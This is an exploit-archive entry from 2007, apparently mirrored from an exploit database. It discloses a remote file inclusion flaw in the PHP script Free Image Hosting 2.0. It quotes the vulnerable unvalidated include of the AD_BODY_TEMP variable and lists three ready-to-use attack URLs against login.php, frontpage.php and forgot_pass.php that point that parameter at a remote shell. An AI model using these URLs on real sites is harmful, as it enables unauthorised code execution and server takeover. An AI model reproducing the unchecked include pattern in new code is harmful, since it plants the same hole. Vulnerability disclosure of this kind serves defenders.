[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Free Image Hosting <= 2.0 (AD_BODY_TEMP) Remote File Inclusion Vulns
# Published : 2007-03-25
# Author : Crackers_Child
# Previous Title : Mambo Module Flatmenu <= 1.07 Remote File Include Exploit
# Next Title : PBlang <= 4.66z Remote Create Admin Exploit


############################################################################################
Baslik  :Image_Upload Script  Remote File Inclusion Exploit
         Free Image Hosting 2.0

.ndir   : http://free-php-scripts.net/scripts/Image_Upload.zip

Bulan   :Crackers_Child

Zay.flk : <td><div align="center"><?php include($AD_BODY_TEMP);?></div></td>

Exploit : www.site.com/imageupload_path/login.php?AD_BODY_TEMP=Shell?

        : www.site.com/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell?

        :www.site.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell ?

Not     :[Olmek Var$a Kaderde Dert Ekleme Derdine ;) ]

Greetz  : EveryBody
############################################################################################ 

# www.Syue.com [2007-03-25]